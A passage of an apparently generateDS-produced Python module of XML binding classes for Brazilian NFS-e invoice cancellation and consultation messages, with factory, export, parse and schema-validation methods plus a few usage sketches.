self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaCancelamentoNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpLoteCancelamentoNFSe
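# Usage sketch (tpNotaCancelamentoNFSe is defined elsewhere in this module;
# its constructor arguments are not shown here): the lote is a plain
# container, so the notes to cancel are appended to the Nota list before
# export.
#
#     import sys
#     lote = tpLoteCancelamentoNFSe(Id='lote1')
#     lote.Nota.append(tpNotaCancelamentoNFSe())
#     lote.export(sys.stdout, level=0)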
class tpNotasCancelamentoNFSe(GeneratedsSuper):
"""Lista de Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotasCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotasCancelamentoNFSe.subclass:
return tpNotasCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpNotasCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotasCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotasCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotasCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotasCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotasCancelamentoNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotasCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaCancelamentoNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpNotasCancelamentoNFSe
class tpRetornoNotasCancelamentoNFSe(GeneratedsSuper):
"""Lista de Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRetornoNotasCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRetornoNotasCancelamentoNFSe.subclass:
return tpRetornoNotasCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpRetornoNotasCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRetornoNotasCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRetornoNotasCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaCancelamentoNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpRetornoNotasCancelamentoNFSe
class tpLoteConsultaNFSe(GeneratedsSuper):
"""Lista de Detalhes da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, NotaConsulta=None, RPSConsulta=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.NotaConsulta = NotaConsulta
self.RPSConsulta = RPSConsulta
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLoteConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLoteConsultaNFSe.subclass:
return tpLoteConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpLoteConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.NotaConsulta is not None or
self.RPSConsulta is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLoteConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLoteConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLoteConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLoteConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLoteConsultaNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLoteConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.NotaConsulta is not None:
self.NotaConsulta.export(outfile, level, namespace_, name_='NotaConsulta', pretty_print=pretty_print)
if self.RPSConsulta is not None:
self.RPSConsulta.export(outfile, level, namespace_, name_='RPSConsulta', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'NotaConsulta':
obj_ = tpNotasConsultaNFSe.factory()
obj_.build(child_)
self.NotaConsulta = obj_
obj_.original_tagname_ = 'NotaConsulta'
elif nodeName_ == 'RPSConsulta':
obj_ = tpRPSsConsultaNFSe.factory()
obj_.build(child_)
self.RPSConsulta = obj_
obj_.original_tagname_ = 'RPSConsulta'
# end class tpLoteConsultaNFSe
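# Usage sketch (illustrative values): a consultation lote may carry a list
# of notes, a list of RPS references, or both, via its two child containers.
#
#     import sys
#     consulta = tpLoteConsultaNFSe(
#         Id='lote1',
#         NotaConsulta=tpNotasConsultaNFSe(
#             Nota=[tpNotaConsultaNFSe(NumeroNota=123)],
#         ),
#     )
#     consulta.export(sys.stdout, level=0)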
class tpNotasConsultaNFSe(GeneratedsSuper):
"""Lista de Detalhes da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotasConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotasConsultaNFSe.subclass:
return tpNotasConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpNotasConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotasConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotasConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotasConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotasConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotasConsultaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotasConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaConsultaNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpNotasConsultaNFSe
class tpNotaConsultaNFSe(GeneratedsSuper):
"""Tipo Detalhes da Nota da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, InscricaoMunicipalPrestador=None, NumeroNota=None, CodigoVerificacao=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.NumeroNota = NumeroNota
self.validate_tpNumero(self.NumeroNota)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotaConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotaConsultaNFSe.subclass:
return tpNotaConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpNotaConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpInscricaoMunicipal_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpNumero_patterns_, str(value)):  # patterns need a string; value is parsed as an integer
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoMunicipalPrestador is not None or
self.NumeroNota is not None or
self.CodigoVerificacao is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotaConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotaConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotaConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotaConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotaConsultaNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotaConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.NumeroNota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNota>%s</ns1:NumeroNota>%s' % (self.gds_format_integer(self.NumeroNota, input_name='NumeroNota'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'NumeroNota':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNota')
self.NumeroNota = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNota)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
# end class tpNotaConsultaNFSe
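
# Usage sketch (editorial addition, not part of the generated bindings):
# serializing a tpNotaConsultaNFSe by hand. The keyword arguments are assumed
# to mirror the element names, following the constructor pattern of the
# sibling classes in this module; the values themselves are invented.
def _example_export_nota_consulta():
    import io
    nota = tpNotaConsultaNFSe(
        Id='nota1',
        InscricaoMunicipalPrestador=1234567,
        NumeroNota=42,
        CodigoVerificacao='ABC123',
    )
    buf = io.StringIO()
    # export() takes the output stream and an indentation level; with the
    # default pretty_print=True it emits newline-terminated XML.
    nota.export(buf, 0)
    return buf.getvalue()
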
class tpRPSsConsultaNFSe(GeneratedsSuper):
"""Lista de Detalhes da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, RPS=None):
self.original_tagname_ = None
if RPS is None:
self.RPS = []
else:
self.RPS = RPS
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRPSsConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRPSsConsultaNFSe.subclass:
return tpRPSsConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpRPSsConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.RPS
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRPSsConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRPSsConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRPSsConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRPSsConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRPSsConsultaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRPSsConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for RPS_ in self.RPS:
RPS_.export(outfile, level, namespace_, name_='RPS', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'RPS':
obj_ = tpRPSConsultaNFSe.factory()
obj_.build(child_)
self.RPS.append(obj_)
obj_.original_tagname_ = 'RPS'
# end class tpRPSsConsultaNFSe
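
# Subclassing note (editorial addition): factory() consults
# CurrentSubclassModule_ first and then the per-class `subclass` attribute,
# so a hand-written subclass can be swapped in without touching the parsing
# code. Because buildChildren() above creates nested <RPS> elements through
# tpRPSConsultaNFSe.factory() (the class defined next), registering a
# subclass there makes parsed trees use it automatically:
#
#     class TrackedRPS(tpRPSConsultaNFSe):
#         pass
#
#     tpRPSConsultaNFSe.subclass = TrackedRPS
#     # factory() -- and therefore build() -- now returns TrackedRPS objects
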
class tpRPSConsultaNFSe(GeneratedsSuper):
"""Tipo Detalhes do RPSSe."""
subclass = None
superclass = None
def __init__(self, Id=None, InscricaoMunicipalPrestador=None, NumeroRPS=None, SeriePrestacao=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
self.SeriePrestacao = SeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRPSConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRPSConsultaNFSe.subclass:
return tpRPSConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpRPSConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
            if not self.gds_validate_simple_patterns(
                    self.validate_tpInscricaoMunicipal_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
            if not self.gds_validate_simple_patterns(
                    self.validate_tpNumero_patterns_, str(value)):
                warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value, self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpSeriePrestacao(self, value):
# Validate type tpSeriePrestacao, a restriction on xs:byte.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpSeriePrestacao' % {"value" : value} )
if value > 99:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpSeriePrestacao' % {"value" : value} )
def hasContent_(self):
if (
self.InscricaoMunicipalPrestador is not None or
self.NumeroRPS is not None or
self.SeriePrestacao is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRPSConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRPSConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRPSConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRPSConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRPSConsultaNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRPSConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.SeriePrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SeriePrestacao>%s</ns1:SeriePrestacao>%s' % (self.gds_format_integer(self.SeriePrestacao, input_name='SeriePrestacao'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'SeriePrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'SeriePrestacao')
self.SeriePrestacao = ival_
# validate type tpSeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
# end class tpRPSConsultaNFSe
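
# Validation sketch (editorial addition): the validate_* helpers warn rather
# than raise, so schema violations can be collected with the standard
# warnings machinery (assuming the module-level Validate_simpletypes_ flag
# is left enabled, as generated).
def _example_collect_validation_warnings():
    import warnings
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter('always')
        # tpSeriePrestacao is an xs:byte restricted to 1..99, so 150 trips
        # the maxInclusive check in validate_tpSeriePrestacao() above.
        tpRPSConsultaNFSe(SeriePrestacao=150)
    return [str(w.message) for w in caught]
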
class tpListaDetalhesConsultaRPS(GeneratedsSuper):
"""Lista de Detalhes da Consulta RPS"""
subclass = None
superclass = None
def __init__(self, Detalhe=None):
self.original_tagname_ = None
if Detalhe is None:
self.Detalhe = []
else:
self.Detalhe = Detalhe
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaDetalhesConsultaRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaDetalhesConsultaRPS.subclass:
return tpListaDetalhesConsultaRPS.subclass(*args_, **kwargs_)
else:
return tpListaDetalhesConsultaRPS(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Detalhe
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaDetalhesConsultaRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaDetalhesConsultaRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
